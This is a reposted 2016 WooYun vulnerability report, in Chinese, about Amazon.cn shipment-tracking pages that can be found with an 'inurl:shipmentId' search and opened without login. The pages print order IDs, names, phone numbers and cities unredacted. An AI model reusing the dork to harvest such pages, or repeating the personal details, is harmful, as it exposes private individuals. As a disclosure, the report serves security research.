亚马逊官网存在设计缺陷(无需登陆/通过加密KEY获取部分用户订单号,手机号,地址)

admin
admin
admin
139297
文章
114
评论
2017年4月26日03:52:58评论285 views字数 239阅读0分47秒阅读模式
摘要

2016-03-05: 细节已通知厂商并且等待厂商处理中
2016-03-06: 厂商已经确认,细节仅向厂商公开
2016-03-16: 细节向核心白帽子及相关领域专家公开
2016-03-26: 细节向普通白帽子公开
2016-04-05: 细节向实习白帽子公开
2016-04-20: 细节向公众公开

漏洞概要 关注数(27) 关注此漏洞

缺陷编号: WooYun-2016-181170

漏洞标题: 亚马逊官网存在设计缺陷(无需登陆/通过加密KEY获取部分用户订单号,手机号,地址)

相关厂商: 亚马逊

漏洞作者: 0x 80

提交时间: 2016-03-05 19:18

公开时间: 2016-04-20 09:38

漏洞类型: 应用配置错误

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 错误信息未屏蔽 配置错误 后台限制不严

2人收藏

漏洞详情

披露状态:

2016-03-05: 细节已通知厂商并且等待厂商处理中
2016-03-06: 厂商已经确认,细节仅向厂商公开
2016-03-16: 细节向核心白帽子及相关领域专家公开
2016-03-26: 细节向普通白帽子公开
2016-04-05: 细节向实习白帽子公开
2016-04-20: 细节向公众公开

简要描述:

亚马逊官网存在设计缺陷(无需登陆,通过加密KEY获取部分用户订单号,手机号,地址)

详细说明:

inurl:shipmentId

https://www.amazon.cn/gp/your-account/ship-track/ref=oh_aui_st_v2_btn?itemId=jgnorojtsimvr&orderId=C03-4240160-1890446&packageIndex=0&shipmentId=D8Kx8t7tR

亚马逊官网存在设计缺陷(无需登陆/通过加密KEY获取部分用户订单号,手机号,地址)

code 区域 
08
 孟小峰/100013541 18991187308
 配送员已从配送站出发,请注意查收包裹
 西安, 陕西, CN
 2016-2-17
 19:37
 孟小峰/100013541 18991187308
 首次尝试包裹配送失败,我们将在下一个工作日再次进行投递
 西安, 陕西, CN
 19:00
 孟小峰/100013541 18991187308
 配送员已从配送站出发,请注意查收包裹
 西安, 陕西, CN
 19:00
 孟小峰/100013541 18991187308
 商品已到站
 西安, 陕西, CN
 10:12
 商品已到站
 Xian, SHAANXI, CN
code 区域 
https://www.amazon.cn/gp/your-account/ship-track/ref=oh_aui_st_v2_btn?itemId=jgnorojtsimvr&orderId=C03-4240160-1890446&packageIndex=0&shipmentId=D8Kx8t7tR
code 区域 
5:32
 您的包裹已配送
 山东省济南市东工商公司已签收 签收, CN
 配送员: 亚马逊海外闪购,跟踪包裹号 #: C03-4240160-1890446
code 区域 
https://www.amazon.cn/gp/your-account/ship-track/ref=oh_aui_st_v2_btn?itemId=jhojmtmoknmnr&orderId=C02-8229228-8946464&packageIndex=0&shipmentId=D7QfPwBYR
code 区域 
0
 樊金月 18519189605
 您的包裹已配送
 北京市, 北京, CN
 配送员: 如风达快递,跟踪包裹号 #: 10113260113520
code 区域 
09
 樊金月 18519189605
 配送员已从配送站出发,请注意查收包裹
 北京市, 北京, CN
 8:45
 商品已到站
 北京市, 北京, CN
 1:47
 送达配送商处
 北京市, 北京, CN
 2016-2-17
 8:12
 运输在途
 北京, 北京, 中国
code 区域 
https://www.amazon.cn/gp/your-account/ship-track?orderId=C01-8724858-7632831&packageIndex=0&ref_=st_v1_desktop_redirect&shipmentId=DQsRgX7WR
code 区域 
34
 您的包裹已配送
 广州市 已签收,感谢使用顺丰,期待再次为您服务, CN
 配送员: 顺丰,跟踪包裹号 #: 603905816395
 14:07
 配送员已从配送站出发,请注意查收包裹
 广州市 正在派送途中,请您准备签收(派件人:叶国良,电话:13924273562), CN
 2016-2-22
 18:30
 承运人取走商品
 南京市 顺丰速运 已收取快件, CN
 0:15
 运输在途
code 区域 
https://www.amazon.cn/gp/your-account/ship-track/ref=oh_aui_st_v2_btn?itemId=jhommrpnnklpr&orderId=C01-8518087-4432037&packageIndex=0&shipmentId=Dv6qPzBdR
code 区域 
15:38
 王怀阳/507275 18911651335
 包裹已投递给客户
 北京市, 北京, CN
 配送员: 亚马逊,跟踪包裹号 #: 10111836456884

亚马逊官网存在设计缺陷(无需登陆/通过加密KEY获取部分用户订单号,手机号,地址)

亚马逊官网存在设计缺陷(无需登陆/通过加密KEY获取部分用户订单号,手机号,地址)

漏洞证明:

code 区域 
https://www.amazon.cn/gp/your-account/ship-track/ref=oh_aui_st_v2_btn?itemId=jgnorojtsimvr&orderId=C03-4240160-1890446&packageIndex=0&shipmentId=D8Kx8t7tR

0

code 区域 
https://www.amazon.cn/gp/your-account/ship-track/ref=oh_aui_st_v2_btn?itemId=jgnorojtsimvr&orderId=C03-4240160-1890446&packageIndex=0&shipmentId=D8Kx8t7tR

1

code 区域 
https://www.amazon.cn/gp/your-account/ship-track/ref=oh_aui_st_v2_btn?itemId=jgnorojtsimvr&orderId=C03-4240160-1890446&packageIndex=0&shipmentId=D8Kx8t7tR

2

code 区域 
https://www.amazon.cn/gp/your-account/ship-track/ref=oh_aui_st_v2_btn?itemId=jgnorojtsimvr&orderId=C03-4240160-1890446&packageIndex=0&shipmentId=D8Kx8t7tR

3

code 区域 
https://www.amazon.cn/gp/your-account/ship-track/ref=oh_aui_st_v2_btn?itemId=jgnorojtsimvr&orderId=C03-4240160-1890446&packageIndex=0&shipmentId=D8Kx8t7tR

4

code 区域 
https://www.amazon.cn/gp/your-account/ship-track/ref=oh_aui_st_v2_btn?itemId=jgnorojtsimvr&orderId=C03-4240160-1890446&packageIndex=0&shipmentId=D8Kx8t7tR

5

code 区域 
https://www.amazon.cn/gp/your-account/ship-track/ref=oh_aui_st_v2_btn?itemId=jgnorojtsimvr&orderId=C03-4240160-1890446&packageIndex=0&shipmentId=D8Kx8t7tR

6

code 区域 
https://www.amazon.cn/gp/your-account/ship-track/ref=oh_aui_st_v2_btn?itemId=jgnorojtsimvr&orderId=C03-4240160-1890446&packageIndex=0&shipmentId=D8Kx8t7tR

7

code 区域 
https://www.amazon.cn/gp/your-account/ship-track/ref=oh_aui_st_v2_btn?itemId=jgnorojtsimvr&orderId=C03-4240160-1890446&packageIndex=0&shipmentId=D8Kx8t7tR

8

修复方案:

版权声明:转载请注明来源 0x 80@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2016-03-06 09:38

厂商回复:

经确认,泄露的信息是配送员信息。非常感谢对亚马逊的支持!

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-03-05 19:31 | railguninhere ( 路人 | Rank:8 漏洞数:3 | 电磁炮大失败!)

    2

    虎虎虎虎虎!!!大神啊这是!

  2. 2016-03-05 19:55 | linkey ( 实习白帽子 | Rank:89 漏洞数:38 | sqlmap的超爱好者)

    1

    Key ?? 我懂了

  3. 2016-03-05 19:56 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低,根本轮不到去拼...)

    1

    前排强势围观。

  4. 2016-03-05 19:59 | 牛 小 帅 ( 普通白帽子 | Rank:1597 漏洞数:386 | bye)

    1

    80大哥 66的

  5. 2016-03-05 20:24 | 子超 ( 路人 | Rank:22 漏洞数:8 | 啊)

    1

    @linkey 我也懂

  6. 2016-03-05 20:29 | 0x 80 ( 普通白帽子 | Rank:1845 漏洞数:509 | If we give enough, if we learn to trust ...)

    1

    @牛 小 帅 好久不见

  7. 2016-03-05 20:42 | sangfor.org ( 实习白帽子 | Rank:54 漏洞数:26 | 天下熙熙,皆为利来; 天下攘攘,皆为利往...)

    1

    牛X

  8. 2016-04-05 18:18 | 邪少 ( 实习白帽子 | Rank:98 漏洞数:18 | 百里长苏)

    1

    那么问题来了 key 你怎么得到呢

  9. 2016-04-05 18:19 | 邪少 ( 实习白帽子 | Rank:98 漏洞数:18 | 百里长苏)

    1

    看错了 原来有inurl

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin